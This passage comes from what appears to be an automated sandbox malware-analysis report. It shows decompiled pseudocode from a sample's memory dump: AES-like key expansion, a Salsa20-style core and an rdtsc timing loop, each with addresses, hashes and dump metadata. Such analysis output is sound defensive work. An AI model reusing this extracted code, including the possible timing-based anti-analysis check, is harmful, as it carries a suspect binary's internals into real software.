				 *_t509 = ( *(0x9be2d8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_a12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_t394 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_a4 & 0x000000ff) * 4) & 0x000000ff ^  *_t512) & 0xff00ff00 | ( *(0x9be2d8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_a12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_t394 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_a4 & 0x000000ff) * 4) & 0x000000ff ^  *_t512) & 0x00ff00ff;
				_t184 =  &(_t512[1]); // 0x5350d045
				asm("rol ecx, 0x8");
				asm("ror eax, 0x8");
				_t509[1] = ( *(0x9be2d8 + (_a12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_a4 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_t394 & 0x000000ff) * 4) & 0x000000ff ^  *_t184) & 0xff00ff00 | ( *(0x9be2d8 + (_a12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_a4 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_t394 & 0x000000ff) * 4) & 0x000000ff ^  *_t184) & 0x00ff00ff;
				_t197 =  &(_t512[2]); // 0x1692e8
				asm("ror eax, 0x8");
				asm("rol ecx, 0x8");
				_t509[2] = ( *(0x9be2d8 + (_a4 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t394 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_a12 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^  *_t197) & 0xff00ff00 | ( *(0x9be2d8 + (_a4 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t394 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_a12 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^  *_t197) & 0x00ff00ff;
				_t210 =  &(_t512[3]); // 0x14c48300
				asm("rol ecx, 0x8");
				asm("ror eax, 0x8");
				_t383 = ( *(0x9be2d8 + (_t394 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_a4 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_a12 & 0x000000ff) * 4) & 0x000000ff ^  *_t210) & 0xff00ff00 | ( *(0x9be2d8 + (_t394 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_a4 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_a12 & 0x000000ff) * 4) & 0x000000ff ^  *_t210) & 0x00ff00ff;
				_t509[3] = _t383;
				return _t383;
			}


























            0x009b85d5
            0x009b85db
            0x009b85ee
            0x009b85f3
            0x009b85fe
            0x009b8603
            0x009b8608
            0x009b860d
            0x009b8617
            0x009b861c
            0x009b8624
            0x009b8627
            0x009b8631
            0x009b8631
            0x009b8636
            0x009b863e
            0x009b8650
            0x009b8650
            0x009b8680
            0x009b8686
            0x009b86be
            0x009b86c4
            0x009b86f0
            0x009b86f3
            0x009b8702
            0x009b870b
            0x009b870e
            0x009b8718
            0x009b873f
            0x009b873f
            0x009b8742
            0x009b874a
            0x009b8940
            0x009b8940
            0x009b8943
            0x00000000
            0x00000000
            0x009b8752
            0x009b876d
            0x009b8798
            0x009b87cb
            0x009b87d4
            0x009b87ec
            0x009b8812
            0x009b8812
            0x009b8841
            0x009b8841
            0x009b887a
            0x009b8880
            0x009b88b8
            0x009b88be
            0x009b88ea
            0x009b88ed
            0x009b88fc
            0x009b8905
            0x009b8908
            0x009b8912
            0x009b8936
            0x009b8936
            0x009b8939
            0x009b893c
            0x009b893c
            0x009b893c
            0x009b893c
            0x009b8957
            0x009b895a
            0x009b89a8
            0x009b89ab
            0x009b89bb
            0x009b8a08
            0x009b8a0d
            0x009b8a10
            0x009b8a20
            0x009b8a70
            0x009b8a75
            0x009b8a7d
            0x009b8a8b
            0x009b8ad6
            0x009b8adb
            0x009b8ade
            0x009b8aed
            0x009b8af0
            0x009b8af7

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: eeec9942841d35b6d33ae33493287d92a6d6fec9a958850709f4050d9d37d1fb
            • Instruction ID: 03e6a2c48c15b871dfe84d2988da3140f1824c50f303e89f24d4aeba2155dbf5
            • Opcode Fuzzy Hash: eeec9942841d35b6d33ae33493287d92a6d6fec9a958850709f4050d9d37d1fb
            • Instruction Fuzzy Hash: 74E16F31A251588FC708CF2DED919B977E0FB49311745422EE656C7392DB38EA22EB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B8AF8, Relevance: .4, Instructions: 350COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 80%
            			E009B8AF8(signed int* _a4, signed int* _a8, signed int* _a12) {
				signed int _t164;
				signed int _t180;
				signed int* _t197;
				signed int _t199;
				signed int* _t216;
				signed int _t218;
				signed int* _t222;
				void* _t223;
				signed int _t239;
				signed int _t259;
				signed int _t277;
				signed int _t295;
				signed int* _t298;
				signed int _t317;
				signed int _t320;
				signed int _t324;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t338;
				signed int _t345;
				signed int _t347;
				signed int _t350;
				signed int _t354;
				signed char _t357;
				signed int _t365;
				signed int* _t366;
				signed int _t372;
				signed int* _t373;
				signed int* _t374;
				signed int _t381;
				signed int _t388;
				signed int _t395;
				signed int* _t396;
				signed int* _t398;
				signed int* _t399;
				signed int* _t401;
				signed int* _t402;

				_t298 = _a8;
				_t399 = _a4;
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				_t3 =  &(_t399[1]); // 0x9b80c0
				_t396 = _t3;
				 *_t399 =  *_t298 & 0xff00ff00 |  *_t298 & 0x00ff00ff;
				asm("ror eax, 0x8");
				asm("rol ecx, 0x8");
				 *_t396 = _t298[1] & 0xff00ff00 | _t298[1] & 0x00ff00ff;
				asm("ror eax, 0x8");
				asm("rol ecx, 0x8");
				_t399[2] = _t298[2] & 0xff00ff00 | _t298[2] & 0x00ff00ff;
				asm("ror edx, 0x8");
				asm("rol eax, 0x8");
				_t354 = _t298[3] & 0xff00ff00 | _t298[3] & 0x00ff00ff;
				_t399[3] = _t354;
				if(_a12 != 0x80) {
					asm("ror eax, 0x8");
					asm("rol ecx, 0x8");
					_t399[4] = _t298[4] & 0xff00ff00 | _t298[4] & 0x00ff00ff;
					asm("ror edx, 0x8");
					asm("rol eax, 0x8");
					_t357 = _t298[5] & 0xff00ff00 | _t298[5] & 0x00ff00ff;
					_t399[5] = _t357;
					if(_a12 != 0xc0) {
						asm("rol ecx, 0x8");
						asm("ror eax, 0x8");
						_t399[6] = _t298[6] & 0xff00ff00 | _t298[6] & 0x00ff00ff;
						asm("ror eax, 0x8");
						asm("rol ecx, 0x8");
						_t164 = _t298[7] & 0xff00ff00 | _t298[7] & 0x00ff00ff;
						_t399[7] = _t164;
						if(_a12 != 0x100) {
							return 0;
						}
						_a8 = 0x9bfadc;
						_t93 =  &(_t399[2]); // 0xc35de58b
						_t365 = ( *(0x9be2d8 + (_t164 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9be2d8 + (_t164 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t164 >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + (_t164 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
						_t180 =  *_t396 ^ _t365;
						_t399[8] = _t365;
						_t399[9] = _t180;
						_t98 =  &(_t399[0xc]); // 0x9b80ec
						_t366 = _t98;
						_t317 =  *_t93 ^ _t180;
						_a12 = _t366;
						_t100 =  &(_t399[3]); // 0x83ec8b55
						_t399[0xa] = _t317;
						_t399[0xb] =  *_t100 ^ _t317;
						do {
							_t103 = _t366 - 4; // 0x50e0458d
							_t197 = _a12;
							_t372 =  *(0x9be2d8 + ( *_t103 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + ( *_t103 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + ( *_t103 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + ( *_t103 & 0x000000ff) * 4) & 0x000000ff ^  *(_t197 - 0x20);
							 *_t197 = _t372;
							_t199 =  *(_t197 - 0x1c) ^ _t372;
							_t373 = _a12;
							 *(_t373 + 4) = _t199;
							_t320 =  *(_t373 - 0x18) ^ _t199;
							 *(_t373 + 8) = _t320;
							 *(_t373 + 0xc) =  *(_t373 - 0x14) ^ _t320;
							_t374 = _t373 + 0x20;
							_a12 = _t374;
							_t216 = _a12;
							_t381 =  *(0x9be2d8 + ( *(_t374 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + ( *(_t374 - 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9be2d8 + ( *(_t374 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + ( *(_t374 - 0x14) & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t216 - 0x30) ^  *_a8;
							 *(_t216 - 0x10) = _t381;
							_t218 =  *(_t216 - 0x2c) ^ _t381;
							_t366 = _a12;
							 *(_t366 - 0xc) = _t218;
							_t324 =  *(_t366 - 0x28) ^ _t218;
							 *(_t366 - 8) = _t324;
							 *(_t366 - 4) =  *(_t366 - 0x24) ^ _t324;
							_t222 =  &(_a8[1]);
							_a8 = _t222;
						} while (_t222 != 0x9bfaf4);
						_push(0xe);
						L4:
						_pop(_t223);
						return _t223;
					}
					_t331 = ( *(0x9be2d8 + (_t357 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9be2d8 + (_t357 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t357 >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + (_t357 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
					_t398 = 0x9bfadc;
					_t239 =  *_t396 ^ _t331;
					_t399[6] = _t331;
					_t54 =  &(_t399[2]); // 0xc35de58b
					_t333 =  *_t54 ^ _t239;
					_t399[7] = _t239;
					_t56 =  &(_t399[3]); // 0x83ec8b55
					_t399[8] = _t333;
					_t399[9] =  *_t56 ^ _t333;
					_t401 =  &(_t399[0xa]);
					do {
						_t59 = _t401 - 0x18; // 0x75ff29eb
						_t60 = _t401 - 4; // 0xc918e8a5
						_t335 =  *_t59 ^  *_t60;
						_t61 = _t401 - 0x14; // 0x8df98b10
						 *_t401 = _t335;
						_t401[1] =  *_t61 ^ _t335;
						_t63 =  &(_t401[6]); // 0xf48b89
						_t401 = _t63;
						_t388 =  *(0x9be2d8 + ( *(_t401 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + ( *(_t401 - 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9be2d8 + ( *(_t401 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + ( *(_t401 - 0x14) & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t401 - 0x28) ^  *_t398;
						_t398 =  &(_t398[1]);
						 *(_t401 - 0x10) = _t388;
						_t259 =  *(_t401 - 0x24) ^ _t388;
						 *(_t401 - 0xc) = _t259;
						_t338 =  *(_t401 - 0x20) ^ _t259;
						 *(_t401 - 8) = _t338;
						 *(_t401 - 4) =  *(_t401 - 0x1c) ^ _t338;
					} while (_t398 != 0x9bfaf8);
					_push(0xc);
					goto L4;
				}
				_t345 = ( *(0x9be2d8 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9be2d8 + (_t354 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t354 >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + (_t354 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
				_t277 =  *_t396 ^ _t345;
				_t399[4] = _t345;
				_t19 =  &(_t399[2]); // 0xc35de58b
				_t399[5] = _t277;
				_t347 =  *_t19 ^ _t277;
				_t399[6] = _t347;
				_t399[7] = _t354 ^ _t347;
				_t402 = 0x9bfadc;
				do {
					_t23 =  &(_t396[4]); // 0x120
					_t396 = _t23;
					_t395 =  *(0x9be2d8 + (_t396[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t396[2] >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9be2d8 + (_t396[2] >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + (_t396[2] & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t396 - 4) ^  *_t402;
					_t402 =  &(_t402[1]);
					_t396[3] = _t395;
					_t295 =  *_t396 ^ _t395;
					_t396[4] = _t295;
					_t350 = _t396[1] ^ _t295;
					_t396[5] = _t350;
					_t396[6] = _t396[2] ^ _t350;
				} while (_t402 != 0x9bfb00);
				_push(0xa);
				goto L4;
			}









































            0x009b8afc
            0x009b8b05
            0x009b8b0d
            0x009b8b15
            0x009b8b1a
            0x009b8b1a
            0x009b8b1f
            0x009b8b26
            0x009b8b2b
            0x009b8b36
            0x009b8b3d
            0x009b8b42
            0x009b8b4d
            0x009b8b55
            0x009b8b58
            0x009b8b66
            0x009b8b6f
            0x009b8b72
            0x009b8c6f
            0x009b8c77
            0x009b8c82
            0x009b8c8a
            0x009b8c8d
            0x009b8c9b
            0x009b8ca4
            0x009b8ca7
            0x009b8dc1
            0x009b8dc4
            0x009b8dd1
            0x009b8dd9
            0x009b8ddc
            0x009b8de7
            0x009b8df0
            0x009b8df3
            0x00000000
            0x009b8f73
            0x009b8dfb
            0x009b8e44
            0x009b8e57
            0x009b8e5e
            0x009b8e60
            0x009b8e63
            0x009b8e66
            0x009b8e66
            0x009b8e69
            0x009b8e6b
            0x009b8e6e
            0x009b8e73
            0x009b8e76
            0x009b8e7e
            0x009b8e7e
            0x009b8ec2
            0x009b8ec5
            0x009b8ec8
            0x009b8ecd
            0x009b8ecf
            0x009b8ed5
            0x009b8ed8
            0x009b8edf
            0x009b8ee2
            0x009b8ee5
            0x009b8ee8
            0x009b8f32
            0x009b8f38
            0x009b8f3a
            0x009b8f40
            0x009b8f42
            0x009b8f45
            0x009b8f4b
            0x009b8f4d
            0x009b8f55
            0x009b8f5b
            0x009b8f5e
            0x009b8f61
            0x009b8f6c
            0x009b8c64
            0x009b8c64
            0x00000000
            0x009b8c64
            0x009b8d01
            0x009b8d03
            0x009b8d08
            0x009b8d0a
            0x009b8d0d
            0x009b8d10
            0x009b8d12
            0x009b8d15
            0x009b8d1a
            0x009b8d1d
            0x009b8d20
            0x009b8d23
            0x009b8d23
            0x009b8d26
            0x009b8d26
            0x009b8d29
            0x009b8d2e
            0x009b8d30
            0x009b8d33
            0x009b8d33
            0x009b8d84
            0x009b8d86
            0x009b8d89
            0x009b8d8f
            0x009b8d91
            0x009b8d97
            0x009b8d99
            0x009b8da1
            0x009b8da4
            0x009b8db0
            0x00000000
            0x009b8db0
            0x009b8bcc
            0x009b8bce
            0x009b8bd0
            0x009b8bd3
            0x009b8bd6
            0x009b8bd9
            0x009b8bdd
            0x009b8be2
            0x009b8be5
            0x009b8bea
            0x009b8bea
            0x009b8bea
            0x009b8c3b
            0x009b8c3d
            0x009b8c40
            0x009b8c45
            0x009b8c47
            0x009b8c4d
            0x009b8c4f
            0x009b8c57
            0x009b8c5a
            0x009b8c62
            0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 744a22f04afd88f143ecdf441bc442f3e3097070049b9a7ff265ad68e71a8126
            • Instruction ID: fd65134c64b369c214940bf2eb92feb67c5fa0a17bc16ab384616e122b06b724
            • Opcode Fuzzy Hash: 744a22f04afd88f143ecdf441bc442f3e3097070049b9a7ff265ad68e71a8126
            • Instruction Fuzzy Hash: ABD17972B246018FE31CCF2DDD90666B7E5EB8C3117448A3DE59ACB385DA38E911DB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B8377, Relevance: .2, Instructions: 221COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 69%
            			E009B8377(void* _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void _v120;
				signed int _t167;
				signed int _t198;
				signed int _t200;
				signed int _t206;
				signed int _t210;
				signed int _t216;
				signed int _t218;
				signed int _t229;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t245;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t269;
				signed int _t270;
				void* _t272;

				_t233 = 0x10;
				_v56 = 0xa;
				memcpy( &_v120, _a8, _t233 << 2);
				_t245 = _v72;
				_t235 = _v60;
				_t239 = _v64;
				_t269 = _v68;
				_t229 = _v76;
				_v8 = _v80;
				_v36 = _v84;
				_v24 = _v88;
				_v48 = _v92;
				_v44 = _v96;
				_v32 = _v100;
				_v20 = _v104;
				_v40 = _v108;
				_v16 = _v112;
				_v12 = _v116;
				_t167 = _v120;
				_v52 = _t245;
				_v28 = _t167;
				do {
					asm("rol eax, 0x7");
					_v20 = _v20 ^ _t167 + _t245;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v20 + _v28;
					asm("rol eax, 0xd");
					_t247 = _v52 ^ _v24 + _v20;
					_v52 = _t247;
					asm("rol eax, 0x12");
					_v28 = _v28 ^ _v24 + _t247;
					asm("rol eax, 0x7");
					_v36 = _v36 ^ _v12 + _v32;
					asm("rol eax, 0x9");
					_t270 = _t269 ^ _v36 + _v32;
					_t248 = _v44;
					asm("rol eax, 0xd");
					_v12 = _v12 ^ _v36 + _t270;
					asm("rol eax, 0x12");
					_v32 = _v32 ^ _v12 + _t270;
					asm("rol eax, 0x7");
					_t240 = _t239 ^ _v8 + _t248;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _v8 + _t240;
					asm("rol eax, 0xd");
					_t249 = _t248 ^ _v16 + _t240;
					_v44 = _t249;
					asm("rol eax, 0x12");
					_v8 = _v8 ^ _v16 + _t249;
					asm("rol eax, 0x7");
					_t251 = _v40 ^ _t229 + _t235;
					_v40 = _t251;
					asm("rol eax, 0x9");
					_t253 = _v48 ^ _t251 + _t235;
					_v48 = _t253;
					asm("rol eax, 0xd");
					_t230 = _t229 ^ _v40 + _t253;
					asm("rol eax, 0x12");
					_t236 = _t235 ^ _t253 + _t230;
					asm("rol eax, 0x7");
					_v12 = _v12 ^ _v28 + _v40;
					_t198 = _v12;
					_v116 = _t198;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _t198 + _v28;
					_t200 = _v16;
					_v112 = _t200;
					asm("rol eax, 0xd");
					_t255 = _v40 ^ _t200 + _v12;
					_v40 = _t255;
					asm("rol eax, 0x12");
					_v108 = _t255;
					_t257 = _v28 ^ _v16 + _t255;
					asm("rol eax, 0x7");
					_v44 = _v44 ^ _v32 + _v20;
					_t206 = _v44;
					_v96 = _t206;
					asm("rol eax, 0x9");
					_v28 = _t257;
					_v120 = _t257;
					_t259 = _v48 ^ _t206 + _v32;
					_v48 = _t259;
					asm("rol eax, 0xd");
					_v20 = _v20 ^ _v44 + _t259;
					_t210 = _v20;
					_v104 = _t210;
					asm("rol eax, 0x12");
					_v92 = _t259;
					_t261 = _v32 ^ _t210 + _t259;
					_v32 = _t261;
					_v100 = _t261;
					_t262 = _v36;
					asm("rol eax, 0x7");
					_t229 = _t230 ^ _v8 + _t262;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v8 + _t229;
					_t216 = _v24;
					_v88 = _t216;
					asm("rol eax, 0xd");
					_t263 = _t262 ^ _t216 + _t229;
					_t218 = _t263;
					_v36 = _t263;
					_v84 = _t218;
					asm("rol eax, 0x12");
					_v8 = _v8 ^ _t218 + _v24;
					_v80 = _v8;
					asm("rol eax, 0x7");
					_t245 = _v52 ^ _t236 + _t240;
					_v52 = _t245;
					_v72 = _t245;
					asm("rol eax, 0x9");
					_t269 = _t270 ^ _t236 + _t245;
					asm("rol eax, 0xd");
					_t239 = _t240 ^ _t269 + _t245;
					asm("rol eax, 0x12");
					_t235 = _t236 ^ _t239 + _t269;
					_t134 =  &_v56;
					 *_t134 = _v56 - 1;
					_t167 = _v28;
				} while ( *_t134 != 0);
				_v76 = _t229;
				_v64 = _t239;
				_t241 = 0;
				_v60 = _t235;
				_t232 = _a8 -  &_v120;
				_v68 = _t269;
				do {
					 *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) =  *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) +  *((intOrPtr*)(_t272 + _t232 + _t241 * 4 - 0x74));
					_t241 = _t241 + 1;
				} while (_t241 < 0x10);
				_t237 = 0x10;
				return memcpy(_a4,  &_v120, _t237 << 2);
			}
































































            0x009b8385
            0x009b8389
            0x009b8390
            0x009b8395
            0x009b8398
            0x009b839b
            0x009b839e
            0x009b83a1
            0x009b83a4
            0x009b83aa
            0x009b83b0
            0x009b83b6
            0x009b83bc
            0x009b83c2
            0x009b83c8
            0x009b83ce
            0x009b83d4
            0x009b83da
            0x009b83dd
            0x009b83e0
            0x009b83e3
            0x009b83e6
            0x009b83eb
            0x009b83ee
            0x009b83f7
            0x009b83fa
            0x009b8403
            0x009b8406
            0x009b840d
            0x009b8410
            0x009b8413
            0x009b841c
            0x009b841f
            0x009b8428
            0x009b842b
            0x009b842d
            0x009b8435
            0x009b8438
            0x009b8440
            0x009b8443
            0x009b844b
            0x009b844e
            0x009b8455
            0x009b8458
            0x009b8460
            0x009b8463
            0x009b846a
            0x009b8470
            0x009b8473
            0x009b8479
            0x009b847c
            0x009b847e
            0x009b8487
            0x009b848a
            0x009b8491
            0x009b8494
            0x009b8497
            0x009b849c
            0x009b849f
            0x009b84a7
            0x009b84aa
            0x009b84ad
            0x009b84b0
            0x009b84b6
            0x009b84b9
            0x009b84bc
            0x009b84bf
            0x009b84c5
            0x009b84cb
            0x009b84d2
            0x009b84d5
            0x009b84d8
            0x009b84de
            0x009b84e6
            0x009b84e9
            0x009b84ec
            0x009b84ef
            0x009b84f5
            0x009b84f8
            0x009b84fb
            0x009b8501
            0x009b8508
            0x009b850b
            0x009b850e
            0x009b8511
            0x009b8514
            0x009b8519
            0x009b851c
            0x009b8522
            0x009b8527
            0x009b852a
            0x009b852d
            0x009b8532
            0x009b8535
            0x009b853c
            0x009b853f
            0x009b8542
            0x009b8545
            0x009b854a
            0x009b854d
            0x009b854f
            0x009b8551
            0x009b8557
            0x009b855d
            0x009b8560
            0x009b8566
            0x009b856c
            0x009b856f
            0x009b8571
            0x009b8574
            0x009b857a
            0x009b857d
            0x009b8582
            0x009b8585
            0x009b858a
            0x009b858d
            0x009b858f
            0x009b858f
            0x009b8593
            0x009b8593
            0x009b859c
            0x009b85a5
            0x009b85a8
            0x009b85aa
            0x009b85ad
            0x009b85af
            0x009b85b2
            0x009b85b9
            0x009b85bd
            0x009b85be
            0x009b85cb
            0x009b85d4

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
            • Instruction ID: 06680ded3fb545784d99eb9532d8f15b124c7e2121d0aa0d26d9566c037fc137
            • Opcode Fuzzy Hash: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
            • Instruction Fuzzy Hash: 7BA17C76D002099FCF80CFA9C981ADEFBF5BF88254F24416AE414F7201E274AA558B94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B58B3, Relevance: .1, Instructions: 75COMMON
            Download Yara Rule
            C-Code - Quality: 72%
            			E009B58B3(signed char __eax, signed int __edx, signed char* _a4) {
				void* _v5;
				signed char _v12;
				signed char _v20;
				signed char _t11;
				void* _t12;
				void* _t14;
				signed char _t19;
				void* _t23;
				signed char _t25;
				signed char _t28;
				signed int _t29;
				signed int _t31;
				signed char _t32;
				signed int _t34;
				void* _t36;
				signed int _t38;
				signed int _t40;
				void* _t42;

				_t29 = __edx;
				_t11 = __eax;
				_t23 = 0;
				do {
					asm("rdtsc");
					_t32 = _t11;
					_t12 = E009B595D();
					asm("rdtsc");
					_v20 = _t12 - _t32;
					asm("sbb ecx, edi");
					_v12 = _t29;
					_t14 = E009B595D();
					_t25 = _v20;
					asm("rdtsc");
					asm("sbb edx, [ebp-0x8]");
					_t11 = _t14 - _t25 - _t32;
					_v20 = _t11;
					asm("sbb edx, edi");
					_t31 = _v12;
					_t38 = _t31;
					if(_t38 <= 0 && (_t38 < 0 || _t25 <= 0xffffffff)) {
						_t40 = _t29;
						if(_t40 <= 0 && (_t40 < 0 || _t11 <= 0xffffffff)) {
							_t34 = _t25 - _t11;
							asm("sbb edi, edx");
							asm("cdq");
							_t11 = _t31 ^ _t29;
							_t36 = (_t34 ^ _t29) - _t29;
							_t42 = _t36;
							asm("sbb eax, edx");
							_v12 = _t11;
							if(_t42 >= 0 && (_t42 > 0 || _t36 >= 0x40)) {
								_v5 = E009B57E7(_t25);
								_t19 = E009B57E7(_v20);
								_t28 = _v5;
								_t11 = _t19 ^ _t28;
								if(_t11 != 0) {
									 *_a4 = _t28;
									return 1;
								}
							}
						}
					}
					_t23 = _t23 + 1;
				} while (_t23 < 0x80);
				return 0;
			}





















            0x009b58b3
            0x009b58b3
            0x009b58bc
            0x009b58be
            0x009b58be
            0x009b58c0
            0x009b58c4
            0x009b58c9
            0x009b58cf
            0x009b58d2
            0x009b58d4
            0x009b58d7
            0x009b58dc
            0x009b58df
            0x009b58e3
            0x009b58e6
            0x009b58e8
            0x009b58eb
            0x009b58ed
            0x009b58f0
            0x009b58f2
            0x009b58fb
            0x009b58fd
            0x009b5908
            0x009b590a
            0x009b590e
            0x009b590f
            0x009b5913
            0x009b5913
            0x009b5915
            0x009b5917
            0x009b591a
            0x009b592c
            0x009b592f
            0x009b5936
            0x009b5939
            0x009b593b
            0x009b5956
